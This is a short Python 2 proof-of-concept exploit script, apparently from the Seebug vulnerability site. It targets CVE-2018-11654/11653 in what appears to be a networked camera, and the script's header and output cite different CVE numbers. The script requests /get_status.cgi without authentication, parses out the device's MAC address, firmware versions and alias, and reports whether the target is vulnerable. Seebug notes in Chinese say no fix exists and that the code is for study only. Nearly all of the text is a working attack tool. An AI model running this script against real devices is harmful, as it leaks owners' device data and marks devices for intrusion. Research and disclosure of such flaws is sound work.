import requests import sys ''' Author: David Castro (SadFud) Contact: https://twitter.com/SadFud75 CVE: CVE-2018-11654 Output example: Mac address: 006E0604AF62 System version: 0.37.2.46 App version: 0.2.9.12 Alias: NOA The target http://REDACTED:8000 is vulnerable to CVE-2018-11653. ''' url = sys.argv[1] + "/get_status.cgi" r = requests.get(url); if r.status_code != 200: print "Error. Target not exploitable." exit() print "Parsing data..." r = r.text.encode("utf8") r = r.replace('\';', '') r = r.replace('var ', '') r = r.replace('=\'', ' ') todo = r.split("\n") wifi = str(todo[14]).split('=') if wifi[1].replace(';', '') == str(1): check = "The target " + sys.argv[1] + " is vulnerable to CVE-2018-11653." else: check = "The target " + sys.argv[1] + " is not vulnerable to CVE-2018-11653." mac = todo[0].split(' ') mac = mac[1] sys = todo[1].split(' ') sys = sys[1] app = todo[2].split(' ') app = app[1] alias = todo[3].split(' ') alias = alias[1] print "Mac address: " + str(mac) print "System version: " + str(sys) print "App version: " + str(app) print "Alias: " + alias print check
暂无临时解决方案
暂无官方解决方案
暂无防护方案
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论